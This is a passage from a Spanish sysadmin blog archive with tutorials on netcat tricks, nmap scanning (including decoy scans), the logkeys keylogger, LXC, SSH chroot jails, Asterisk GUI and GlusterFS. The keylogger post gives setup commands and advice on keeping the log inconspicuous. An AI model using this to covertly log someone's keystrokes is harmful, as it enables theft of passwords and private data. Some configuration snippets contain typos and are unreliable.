# while true; do nc -l -p 80 -q 1 < index.html; done

Cliente:

#echo “GET /” | nc www.google.com 80 < index.html

Streaming de audio:

Servidor:

#nc -l -p 1234 < fichero.mp3

Cliente:

#cat *.mp3 | nc -l -p 1234

Streaming de video:

Servidor:

#nc -l -p 1234 < pelicula.avi

Cliente:

#nc server.example.org 1234 | mplayer -

PortForward o Proxy:

#nc -l -p 1234 -c “nc example.org 22”

Clonar un disco a traves de la red:

Servidor:

#dd if=/dev/sda1 | nc -l -p 1234

Cliente:

#nc server.example.org 1234 | dd of=pendrive.img

#mount pendrive.img -r -t vfat -o loop /mnt/usb

Ver la Guerra de las galaxias:

#nc towel.blinkenlights.nl 23

Usado como escaner de red:

# nc -z -w 3 -v localhost 1-2000
localhost [127.0.0.1] 1234 (?) open
localhost [127.0.0.1] 113 (auth) open
localhost [127.0.0.1] 37 (time) open

Suplantando cabeceras HTTP:

# nc google.com 80
GET / HTTP/1.1
Host: google.com
User-Agent: NOT-YOUR-BUSINES
Referrer: YOUR-MOM.COM

Luego dar enter - y veras como cambia la respuesta !!!

La verdad hay muchísimas combinaciones de netcat, para hacer auditorias de seguridad.

Gracias, espero les guste.

Nmap - Escaner de redes

2011-10-24T19:00:00.000-07:00

Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática.

Características:

Descubrimiento de servidores: Identifica computadoras en una red, por ejemplo listando aquellas que responden ping.
Identifica puertos abiertos en una computadora objetivo.
Determina qué servicios está ejecutando la misma.
Determinar qué sistema operativo y versión utiliza dicha computadora, (esta técnica es también conocida como fingerprinting).
Obtiene algunas características del hardware de red de la máquina objeto de la prueba.

NOTA: Para ejecutar nmap con todas las características y las propiedades es aconsejable utilizarlo como usuario root. Cabe de aclarar que el manejo hoy demostrado en este post, es totalmente por terminal de comandos como usuario root.

Funcionamiento:

Ejecutando Nmap por primera vez y leyendo la ayuda:

#nmap -h

Nmap 5.51 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sn: Ping Scan - disable port scan
-Pn: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers : Specify custom DNS servers
--system-dns: Use OS's DNS resolver
--traceroute: Trace hop path to each host
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags
-sI : Idle scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-sO: IP protocol scan
-b : FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports : Scan most common ports
--port-ratio : Scan ports more common than
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=: is a comma separated list of
directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take are in seconds, or append 'ms' (milliseconds),
's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
-T<0-5>: Set timing template (higher is faster)
--min-hostgroup/max-hostgroup : Parallel host scan group sizes
--min-parallelism/max-parallelism : Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout : Specifies
probe round trip time.
--max-retries : Caps number of port scan probe retransmissions.
--host-timeout : Give up on target after this long
--scan-delay/--max-scan-delay : Adjust delay between probes
--min-rate : Send packets no slower than per second
--max-rate : Send packets no faster than per second
FIREWALL/IDS EVASION AND SPOOFING:
-f; --mtu : fragment packets (optionally w/given MTU)
-D : Cloak a scan with decoys
-S : Spoof source address
-e : Use specified interface
-g/--source-port : Use given port number
--data-length : Append random data to sent packets
--ip-options : Send packets with specified ip options
--ttl : Set IP time-to-live field
--spoof-mac : Spoof your MAC address
--badsum: Send packets with a bogus TCP/UDP/SCTP checksum
OUTPUT:
-oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once
-v: Increase verbosity level (use -vv or more for greater effect)
-d: Increase debugging level (use -dd or more for greater effect)
--reason: Display the reason a port is in a particular state
--open: Only show open (or possibly open) ports
--packet-trace: Show all packets sent and received
--iflist: Print host interfaces and routes (for debugging)
--log-errors: Log errors/warnings to the normal-format output file
--append-output: Append to rather than clobber specified output files
--resume : Resume an aborted scan
--stylesheet : XSL stylesheet to transform XML output to HTML
--webxml: Reference stylesheet from Nmap.Org for more portable XML
--no-stylesheet: Prevent associating of XSL stylesheet w/XML output
MISC:
-6: Enable IPv6 scanning
-A: Enable OS detection, version detection, script scanning, and traceroute
--datadir : Specify custom Nmap data file location
--send-eth/--send-ip: Send using raw ethernet frames or IP packets
--privileged: Assume that the user is fully privileged
--unprivileged: Assume the user lacks raw socket privileges
-V: Print version number
-h: Print this help summary page.
EXAMPLES:
nmap -v -A scanme.nmap.org
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
SEE THE MAN PAGE (http://nmap.org/book/man.html) FOR MORE OPTIONS AND EXAMPLES

Escaneando nuestra maquina local:

# nmap localhost

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-24 21:04 COT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000080s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
37/tcp open time
113/tcp open auth
1234/tcp open hotline

Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds

Buscar todas las IP's Activas en nuestra red:

# nmap 192.168.0.0/24

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-24 21:07 COT
Nmap scan report for 192.168.0.1
Host is up (0.029s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp open http
MAC Address: 00:E0:4D:EF:7A:JH (Internet Initiative Japan)

Nmap scan report for 192.168.0.10
Host is up (0.0000080s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
37/tcp open time
113/tcp open auth
1234/tcp open hotline

Nmap done: 256 IP addresses (2 hosts up) scanned in 11.37 seconds

#nmap -sP 192.168.0.*

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-24 21:14 COT
Nmap scan report for 192.168.0.1
Host is up (0.0019s latency).
MAC Address: 00:E0:4D:4D:7A:DC (Internet Initiative Japan)
Nmap scan report for 192.168.0.5
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 10.76 seconds

Obtener una lista de ips con un puerto especifico abierto:

En nuestro caso vamos a a decirle a nmap que busque en toda mi red local, las ips que tengan el puerto TCP 1234 abierto:

#nmap -sT -p 1234 -oG - 192.168.0.0/24 | grep open

Host: 192.168.0.5 () Ports: 1234/open/tcp//hotline///

Hacer ping a un rango de IP's para detectar las activas:

#nmap -sP 192.168.0.1-10

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-24 21:17 COT
Nmap scan report for 192.168.0.1
Host is up (0.0011s latency).
MAC Address: 00:E0:4D:4D:7A:DC (Internet Initiative Japan)
Nmap scan report for 192.168.0.5
Host is up.
Nmap done: 10 IP addresses (2 hosts up) scanned in 0.73 seconds

Escanear una IP utilizando un señuelo:

# nmap 192.168.0.1 -D 192.168.0.100

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-24 21:22 COT Nmap scan report for 192.168.0.1 Host is up (0.050s latency). Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http MAC Address: 00:E0:4D:4D:7A:DC (Internet Initiative Japan) Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds

Un escaneo mas completo hacia una IP: Mi Router

#nmap -sS -PO -sV -O 192.168.0.1

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-24 21:24 COT

Nmap scan report for 192.168.0.1
Host is up (0.0079s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
23/tcp open telnet?
80/tcp open http Allegro RomPager 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
MAC Address: 00:E0:4D:4D:7A:DC (Internet Initiative Japan)
Device type: broadband router|switch|storage-misc
Running: Huawei embedded, ZyXEL ZyNOS 3.X, NexStor embedded
OS details: Huawei SmartAX MT800u-T ADSL router, ZyXEL ES-4024A switch, or ZyXEL Prestige 650HW ADSL router, NexStor Nexsan ATABoy2x NAS device
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.75 seconds

Escaneo mas completo hacia mi maquina local:

# nmap -sS -PO -sV -O 192.168.0.5

Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-24 21:25 COT
Nmap scan report for 192.168.0.5
Host is up (0.000044s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
37/tcp open time (32 bits)
113/tcp open ident
1234/tcp open ssh OpenSSH 5.8 (protocol 2.0)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.08 seconds

Como asi mas completo ?

Pues en los dos anteriores ejemplos; se estan habilitando las siguientes banderillas:

-sS escaneo SYN TCP.

-P0 desactiva ping (ICMP).

-sV activa la deteccion de versiones.

-O activa la deteccion del sistema operativo.

Otras opciones:

-A activa la deteccion del sistema operativo, deteccion de version y traceroute.

-v muestra mas detalles. Usa dos o mas para mas detalles.

NOTA: Como pueden notar en los ultimos dos escaneos, el nmap detecto que el puerto de mi maquina 1234 era un servicio de ssh, y en los primeros escaneos, detecto que era un servicio hotline.

Gracias ... espero les halla gustado.

LogKeys - Keylogger en Linux

2011-10-24T16:01:00.000-07:00

Que es logkeys ?

logkeys es un keylogger Linux (GNU / Linux solamente). No es más avanzado que otros keyloggers linux disponible, pero es un poco más estable hasta la fecha y nunca se debe bloquear el entorno grafico X; ademas trabaja con teclados USB y Seriales.

Se basa en la interfaz de eventos del subsistema de entrada de Linux. Una vez establecido, registra todos los caracteres comunes y las teclas de función, además de ser plenamente consciente de la tecla Mayús y modificaciones con ALT-GR.

Que es un Keylogger ?

Un keylogger (derivado del inglés: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de internet.

Suele usarse como malware del tipo daemon, permitiendo que otros usuarios tengan acceso a contraseñas importantes, como los números de una tarjeta de crédito, u otro tipo de información privada que se quiera obtener.

El registro de lo que se teclea puede hacerse tanto con medios de hardware como de software. Los sistemas comerciales disponibles incluyen dispositivos que pueden conectarse al cable del teclado (lo que los hace inmediatamente disponibles pero visibles si un usuario revisa el teclado) y al teclado mismo (que no se ven pero que se necesita algún conocimiento de como soldarlos para instalarlos en el teclado). Escribir aplicaciones para realizar keylogging es trivial y, como cualquier programa computacional, puede ser distribuido a través de un troyano o como parte de un virus informático o gusano informático. Se dice que se puede utilizar un teclado virtual para evitar esto, ya que sólo requiere clics del ratón. Sin embargo, las aplicaciones más nuevas también registran screenshots (capturas de pantalla) al realizarse un click, que anulan la seguridad de esta medida.

Entorno de trabajo:

Sitema Operativo:

Slackware 13.37 x86_64, Ubuntu 11.04

Requerimientos

Slackware: g++, gcc, make.

Ubuntu: build-essentials

NOTA: trabajar siempre en una terminal como usuario root.

Proceso de Instalación:

Descarga del paquete:

#wget http://code.google.com/p/logkeys/downloads/detail?name=logkeys-0.1.1a.tar.gz&can=2&q=

o ingresar a la web oficial y descargarlo:

http://code.google.com/p/logkeys/downloads/list

Descomprimir el paquete:

#tar xvfz logkeys-0.1.1a.tar.gz

Configuración

#cd logkeys-0.1.1

#./configure

Compilación

#make

Instalación

#make install

Como usarlo ??

Establecer un archivo como LOG; en nuestro caso utilizaremos /var/log/logkeys.txt

#touch /var/log/logkeys.txt

Ver las opciones que trae el logkeys para usarlas; ejecutar:

#logkeys

Usage: logkeys [OPTION]...

Log depressed keyboard keys.

-s, --start start logging keypresses

-m, --keymap=FILE use keymap FILE

-o, --output=FILE log output to FILE [/var/log/logkeys.log]

-u, --us-keymap use en_US keymap instead of configured default

-k, --kill kill running logkeys process

-d, --device=FILE input event device [eventX from /dev/input/]

-?, --help print this help screen

--export-keymap=FILE export configured keymap to FILE and exit

--no-func-keys log only character keys

--no-timestamps don't prepend timestamps to log file lines

--post-http=URL POST log to URL as multipart/form-data file

--post-size=SIZE post log file when size equals SIZE [500k]

Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log

logkeys -s -d event6

logkeys -k

logkeys version: 0.1.1a

NOTA: Tener en cuenta que tipo de teclado usamos; si es Español o Ingles; en nuestro caso usaremos los dos con la diferencia que el teclado Español va a ser USB.

Correr logkeys con la opcion de teclado Ingles:

#logkeys -start –us-keymap –output=/var/log/logkeys.txt

Correr el logkeys con la opcion de teclado en español:

Descargar el mapa del teclado de la siguiente URL:

http://code.google.com/p/logkeys/wiki/Keymaps#Download

En nuestro caso descargamos el mapa de teclado “Español España”

Ejecutar:

#logkeys --start --keymap=es.map –output=/var/log/logkeys.txt

LogsKeys en teclados USB.

Actualmente este manual fue probado en los dos sistemas operativos antes nombrados; pero tenían en común un problema; cuando corría el logkeys en mi portátil y conectaba el teclado USB, no guardaba las teclas presionas por el teclado USB si no por el teclado del portátil.

Solución:

Utilizando el siguiente comando como root, puedes detectar el dispositivo usb que quieres configurar con el logkeys, y pasarselo como una banderilla al logkeys:

#cat /dev/inputX

Donde X es los dispositivos que tengas en dicha carpeta /dev/input/; cuando ejecutas ese comando, y tecleas de mas … aparecen caracteres extraños como los siguientes:

dMí¥NÌv

Con eso, determinas cual es el teclado usb, en mi caso fue el /dev/input/event10 en los dos sistemas operativos.

Como correr entonces el logskeys con mi teclado USB ?

#logkeys --start --keymap=es.map –output=/var/log/logkeys -d /dev/input/event10

El comando anterior corre un teclado USB Español, utilizando el dispositivo /dev/input/event10.

NOTA: En caso de auditoria informática, no colocar el log de logkeys en un lugar tan evidente ni con el nombre tan evidente.

Gracias ... Espero les funcione !!!

LXC - Linux Containers

2011-10-23T23:18:00.000-07:00

LXC (Linux Contenedores) es un método de virtualización a nivel de sistema operativo para ejecutar múltiples sistemas aislados Linux (contenedores) en un host de control único. LXC no proporciona una máquina virtual, sino que proporciona un entorno virtual que tiene su propio proceso y espacio en la red.

Es similar a otras tecnologías de virtualización que hay en Linux, tales como OpenVZ y Linux VServer, así como los que en otros sistemas operativos como FreeBSD Jaulas y Solaris Containers.

Entorno de trabajo:

Sistema Operativo = Ubuntu server 11.04.

Instalación de LXC:

#apt-get install lxc vlan bridge-utils python-software-properties screen libvirt-bin debootstrap

Configurar la carpeta para CGROUPS

Que son los cgroups?

cgroups (grupos de control) es una característica del kernel Linux para limitar, cuenta y aislar el uso de recursos (CPU, memoria, disco I / O, etc) de los grupos de procesos. Este trabajo fue iniciado por Rohit Seth en 2006, bajo el "proceso de contenedores" nombre, [1] a finales de 2007 cambió su nombre a cgroups y se fusionó a la versión 2.6.24 del núcleo. Desde entonces, muchas nuevas características y los controladores han sido agregados.

Leer mas.

Crear el siguiente directorio:

#mkdir /cgroup

Editar el /etc/fstab, para hacer el montaje automático de los cgroups:

#vi /etc/fstab

Agregar la siguiente linea:

none /cgroup cgroup defaults 0 0

Montar los cgroups manualmente:

#mount /cgroup

Configurar un entorno para trabajar con LXC

Se trata de crear una carpeta donde solo se trabaje lxc, donde tu puedas colocar los archivos de configuración y demás archivos pero que solo tienen que ver con lxc.

En este ejemplo tomaremos /mnt/lxc, entonces crearmos la carpeta:

#mkdir /mnt/lxc

Luego creamos la carpeta donde van a quedar los templates de los sitemas operativos:

#mkdir /mnt/lxc/os

Luego creamos la carpeta donde colocaremos los archivos de configuración de cada maquina que vayamos a virtualizar:

#mkdir /mnt/lxc/config

Luego creamos la carpeta donde vamos a colocar los templates:

#mkdir /mnt/lxc/templates

Instalación y configuración de un template de sistema operativo:

LXC puede usar los templates de sistema operativo que usa OpenVZ, pueden ser descargados de la siguiente URL:

wiki.openvz.org/Download/template/precreated

Descarga template sistema Operativo en la carpeta de templates /mnt/lxc/templates:

En una terminal ejecutar:

#cd /mnt/lxc/templates/

#wget http://download.openvz.org/template/precreated/ubuntu-11.04-x86_64.tar.gz

Descomprimir el template en una carpeta descriptiva que indique que sistema operativo que es!!:

#mkdir rootfs-ubuntu-11.04

#cd rootfs-ubuntu-11.04

#tar xvfz ubuntu-11.04-x86_64.tar.gz

Configuración del template descargado.

Configuraciones a realizar:

Cambio password de root.
Actualizacion del sistema Operativo.

Entrar al template descargado y copiar los siguientes archivos:

#cd /mnt/lxc/templates/rootfs-ubuntu-11.04/

#cp -r /etc/resolv.conf ./etc

Luego hacer chroot dentro del template descargado:

#chroot /mnt/lxc/templates/rootfs-ubuntu-11.04/

Que hace chroot ? R:// Aquí

Al ejecutar chroot quedas dentro del sistema operativo template, y los cambios que realices solo se veran reflejados dentro del template, y no en el sistema real.

Editar el archivo de configuracion del sitema de paquetes apt para hacer la actualizacion de paquetes:

-Template-#vi /etc/apt/sources.list

Agregar las siguientes lineas:

deb http://us.archive.ubuntu.com/ubuntu/ natty main restricted

deb-src http://us.archive.ubuntu.com/ubuntu/ natty main restricted

deb http://us.archive.ubuntu.com/ubuntu/ natty universe

deb-src http://us.archive.ubuntu.com/ubuntu/ natty universe

deb http://us.archive.ubuntu.com/ubuntu/ natty-updates universe

deb-src http://us.archive.ubuntu.com/ubuntu/ natty-updates universe

deb http://us.archive.ubuntu.com/ubuntu/ natty multiverse

deb-src http://us.archive.ubuntu.com/ubuntu/ natty multiverse

deb http://us.archive.ubuntu.com/ubuntu/ natty-updates multiverse

deb-src http://us.archive.ubuntu.com/ubuntu/ natty-updates multiverse

Actualizamos los repositorios del template:

-Template-#apt-get update

Luego actualizamos el sistema del template:

-Template-#apt-get upgrade

NOTA: Al actualizar el sistema, nos imprimirá un error que tiene que ver con Bind9, dicho error es por que el template aun no tiene un IP real, lo cual deben hacer caso omiso a ello.

Colocamos a que el servicio de OpenSSH inicie automáticamente cuando la el template inicie o entre en funcionamiento:

-Template-#update-rc.d ssh defaults

Cambiar el password de root del template:

-Template-#passwd

XXXXX

Configurar el idioma del sistema template llamado LOCALE:

-Template-#apt-get install --force-yes -y gpgv

-Template-#apt-get update

-Template-#apt-get -y install language-pack-en

-Template-#locale-gen en_US.UTF-8

-Template-#/usr/sbin/update-locale LANG="en_US.UTF-8" LANGUAGE="en_US.UTF-8" LC_ALL="en_US.UTF-8" LC_CTYPE="C"

Salir del chroot, y volver a la maquina real:

-Template-#exit

Configurar la tarjeta de red del sistema Operativo como Bridge, para así darle IP a cada Container que creemos:

Instalar el soporte para Birdge:

#apt-get install bridge-utils

Editar el siguiente archivo:

#vi /etc/network/interfaces

El archivo debe quedar de la siguiente manera:

NOTA: tener en cuenta que la maquina esta usando una interfaz eth0, en caso de no ser asi cambiar el valor bridge_port con la interfaz que estes usando.

auto lo
iface lo inet loopback

# The primary network interface
auto br0
iface br0 inet static
address 192.168.188.160
netmask 255.255.255.0
gateway 192.168.188.1
bridge_ports eth0
bridge_stp off
bridge_maxwait 5

Reiniciar la maquina para que tome los cambios:

#reboot

Creación archivos de configuración de nuestro container de prueba.

#vi /mnt/lxc/config/vm01.conf

Agregar las siguientes lineas:

lxc.utsname = vm01
lxc.tty = 4
lxc.network.type = veth
lxc.network.flags = up
lxc.network.link = br0
lxc.network.name = eth0
lxc.network.mtu = 1500
lxc.network.ipv4 = 192.168.0.2/24
lxc.rootfs = /mnt/lxc/os/vm01/rootfs-ubuntu-11.04
lxc.mount = /mnt/lxc/os/vm01/fstab
lxc.cgroup.devices.deny = a
# /dev/null and zero
lxc.cgroup.devices.allow = c 1:3 rwm
lxc.cgroup.devices.allow = c 1:5 rwm
# consoles
lxc.cgroup.devices.allow = c 5:1 rwm
lxc.cgroup.devices.allow = c 5:0 rwm
lxc.cgroup.devices.allow = c 4:0 rwm
lxc.cgroup.devices.allow = c 4:1 rwm
# /dev/{,u}random
lxc.cgroup.devices.allow = c 1:9 rwm
lxc.cgroup.devices.allow = c 1:8 rwm
# /dev/pts/* - pts namespaces are "coming soon"
lxc.cgroup.devices.allow = c 136:* rwm
lxc.cgroup.devices.allow = c 5:2 rwm
# rtc
lxc.cgroup.devices.allow = c 254:0 rwm

Administración de los containers o maquinas virtualizadas

Crear un contenedor o una maquina virtual:

#lxc-create -f /mnt/lxc/config/vm01.conf

Listar los contenedores creador:

#lxc-ls

Mirar el estado de un contenedor:

#lxc-info -n vm01

Inicializar un contenedor o maquina virtual:

#lxc-start -d -n vm01

Apagrar un contenedor o maquina virtual:

#lxc-stop -n vm01

Acceder al contenedor:

Para acceder al contenedor, se debe hacer por medio de SSH.

#ssh -l root 192.168.0.2

Password: XXXXX

Eliminar un contenedor:

#lxc-destroy -n vm01

Configurar LXC para que cuando inicie el servidor, inicie los contenedores automáticamente.

Editar el siguiente archivo:

#vi /etc/default/lxc

Habilitar la linea :

RUN=yes

Setear el directorio done están los .conf de los contenedores:

CONF_DIR=/mnt/lxc/config/

Setear cuales contenedores van a iniciar, separados por espacio en caso de ser varios:

CONTAINERS=”vm01”

Luego reiniciar el servicio de LXC:

#/etc/init.d/lxc restart

Dudas, inquietudes y reclamos .. en los comentarios ..

Gracias !!

SSH Enjaulado

2011-10-23T04:19:00.000-07:00

Saludos ..

Paso #1 “Descarga de script para hacer el Enjaulado automático y ligero”:

http://www.fuschlberger.net/programs/ssh-scp-sftp-chroot-jail/

En esta web encuentran un script que se llama make_chroot_jail.sh el cual hace todo el proceso de crear la jaula para los usuario que queramos.

Descargar desde terminal:

#wget http://www.fuschlberger.net/programs/ssh-scp-sftp-chroot-jail/make_chroot_jail.sh

Paso #2 “Ejecutar el script”:

Antes de ejecutar el script, debemos de tener en mente donde va a quedar la jaula o el sistema raíz que queremos emular, y que shell va a usar el usuario cuando se logee; en este ejemplo tomamos los siguiente valores:

Jaula = /home/jail

Shell = /bin/bash

Ejemplo de Ejecución:

#./make_chroot_jail.sh USER SHELL JAULA

Ejecución:

#./make_chroot_jail.sh user_x /bin/bash /home/jail

Al ejecutarlo nos imprime lo siguiente; donde escribimos “yes” y luego "Enter":

Are you sure you want to overwrite it?

(you want to say yes for example if you are running the script for the second

time when adding more than one account to the jail)

(yes/no) -> yes

Luego Nos pide el password del usuario, el cual estamos creando al mismo tiempo en el sistema:

Please use a combination of upper and lower case letters and numbers.

New password:xxxxxxxx

Re-enter new password: xxxxxxxx

passwd: password changed.

Paso #3 “Configurar el ssh para que haga el chroot automático”:

Editar el archivo /etc/ssh/sshd_config:

#vi /etc/ssh/sshd_config

Comentar la linea:

#Subsystem sftp /usr/libexec/sftp-server

Agregar las siguientes lineas:

Subsystem sftp internal-sftp

Match User user_x

ChrootDirectory /home/jail/

AllowTcpForwarding no

Luego reinicar el servicio de ssh:

Slackware:

#/etc/rc.d/rc/sshd restart

Debian:

#/etc/init.d/ssh reload

Ubuntu:

#service ssh reload

Paso #4 “Probar la jaula realizando una conexión”:

#ssh -l user_x localhost

user_x@localhost's password: XXXXX

-bash-4.1$ ls

bin dev etc home lib64 sbin usr

-bash-4.1pwd

Ahora debes comparar la los archivos que hay en la raíz de esa conexión ssh que acabaste de hacer, con los del sistema real; lo cual te darás cuenta que no es el mismo.

Otra formas es listar en el sistema real la carpeta /home/jail y la compara con el listado de la raíz “/” de la conexión ssh con el usuario slackuser.

NOTA:

Con esta configuración que acabamos de hacer; el usuario slack solo puede ejecutar lo que esta seteado en la linea 121 del script make_chroot_jail.sh; si desean agregar mas comandos para que ese usuario pueda ejecutarlos solo es que agreguen el path completo del comando, tal y como esta en la linea 121 y y por ultimo ejecutar el script de nuevo pero con la opción update:

#./make_chroot_jail.sh update

Gracias ...

Asterisk GUI

2011-10-22T23:14:00.000-07:00

Asterisk-GUI es una ADD agregado al paquete de asterisk desde la versión 1.4, dicho ADD, tiene la opción de iniciar una interfaz gráfica donde se pueden configurar extensiones y planes de marcado de manera fácil para una red interna.

Configurar el asterisk GUI:

Editar el archivo /etc/asterisk/http.conf

# vi /etc/asterisk/http.conf

deben de quedar las lineas en el siguiente orden:

[general]
enabled = yes
enablestatic = yes
bindaddr = 192.168.1.1 => Ip del servidor asterisk
bindport = 8088 => Puerto por donde accederemos al GUI de asterisk

Guardar y salir de la edición del archivo.

Editar el archivo /etc/asterisk/manager.conf

# vi /etc/asterisk/manager.conf

deben quedar las lineas en el siguiente orden:

[general]
enabled = yes
webenabled = yes
port = 5038
bindaddr = 127.0.0.1

[admin] => Nombre del usuario que va administrar el Asterisk-GUI ademas de ser un label.
secret = 12345.x => Password de logeo a la aplicacion Asterisk-GUI
read = system,call,log,verbose,agent,user,config,dtmf,reporting,cdr,dialplan
write = system,call,agent,user,config,command,reporting,originate

Descargar e instalar el Asterisk-GUI

Posicionarse en un directorio seguro: /usr/local/src

# cd /usr/local/src

Descargar el Codigo fuente de Asterisk-GUI con subversion:

# svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0 asterisk-gui-2.0

Entrar al directorio descargado:

# cd asterisk-gui-2.0

Configurar la instalacion:

# ./configure

Compilar el codigo fuente:

# make

Instalar el paquete:

# make install

Comprobar la instalación y configuración del asterisk:

# make checkconfig

Reiniciar el asterisk:

/etc/init.d/asterisk restart

Configurar algunos enlaces simbólicos:

# cd /usr/share/asterisk/static-http
# ln -s /var/lib/asterisk/static-http/config
# ln -s /var/lib/asterisk/static-http/index.html

Setear los siguientes permisos:

# chmod 777 /var/lib/asterisk/static-http/config

Probar el Asterisk-GUI:

Abrir la siguiente URl en un navegador:

http://ip_del_servidor:8088/static/config/index.html

Gracias !!!

GlusterFS

2011-10-22T22:05:00.000-07:00

GlusterFS is an open source, clustered file system capable of scaling to several petabytes and handling thousands of clients. GlusterFS clusters together storage building blocks over Infiniband RDMA and/or TCP/IP interconnect, aggregating disk and memory resources and managing data in a single global namespace. GlusterFS is based on a stackable user space design and can deliver exceptional performance for diverse workloads.

The GlusterFS modular architecture allows administrators to stack modules to match user requirements, as needed. For example, administrators can use GlusterFS to quickly configure a standalone server system and later expand the system as needs grow.

GlusterFS v3.2 includes the ability to set quota on the usage of disk space by directories or volume. The storage administrators can control the disk space utilization at the directory and/or volume levels in GlusterFS by setting limits to allocatable disk space at any level in the volume and directory hierarchy. This is particularly useful in cloud deployments to facilitate utility billing model.

GlusterFS Geo-replication provides a continuous, asynchronous, and incremental replication service from one site to another over Local Area Networks (LANs), Wide Area Network (WANs), and across the Internet.

Gluster v3.2 introduces Volume Top and Profile commands to monitor different parameters of the workload, thereby helping in capacity planing and performance tuning tasks of the GlusterFS volume.

Implementation:

Work Environment:

3 Machines with Ubuntu as Operating System.

These machines will be client and server "GlusterFS" simultaneously.

Configure GlusterFS Service or Server:

Install GlusterFS software:

#apt-get install glusterfs-server

Add host's IP at /etc/hosts

#vi /etc/hosts

192.168.0.1 nodo1
192.168.0.2 nodo2
192.168.0.3 nodo3

Create in all nodes, the following directory:

#mkdir /opt/gluster

Create the following file, in all nodes:

#vi /etc/glusterfs/glusterfsd.vol

volume posix
type storage/posix
option directory /DATA/gluster/export
end-volume

volume locks
type features/locks
subvolumes posix
end-volume

volume brick
type performance/io-threads
option thread-count 8
subvolumes locks
end-volume

volume server
type protocol/server
option transport-type tcp
option auth.addr.brick.allow 192.168.0.1,192.168.0.2,192.168.0.3
subvolumes brick
end-volume

NOTE: With this configuration on all nodes, server or service is fully installed and functional.

Configure GlusterFS Client:

Create the following file, in all nodes:

#vi /etc/glusterfs/glusterfs.vol

volume node1
type protocol/client
option transport-type tcp
option remote-host node1
option remote-subvolume brick
end-volume

volume node2
type protocol/client
option transport-type tcp
option remote-host node2
option remote-subvolume brick
end-volume

volume node3
type protocol/client
option transport-type tcp
option remote-host node3
option remote-subvolume brick
end-volume

volume replicate
type cluster/replicate
subvolumes node1 node3 node3
end-volume

volume writebehind
type performance/write-behind
option window-size 1MB
subvolumes replicate
end-volume

volume cache
type performance/io-cache
option cache-size 128MB
subvolumes writebehind
end-volume

Create mount point in all nodes:

#mkdir /mnt/glusterfs

Start glusterfs service in all nodes.

#/etc/init.d/glusterfs-server restart

Then mount all shared directory, in all nodes:

#mount -t glusterfs /etc/glusterfs/glusterfs.vol /mnt/glusterfs

#glusterfs /mnt/glusterfs

Testing:

Create a file in node1 with some information, example:

#cat /proc/cepuinfo > /mnt/glusterfs/file1.txt

then ...

go to node2 an node3 and search in to directory /mnt/glusterfs

#ls /mnt/glusterfs

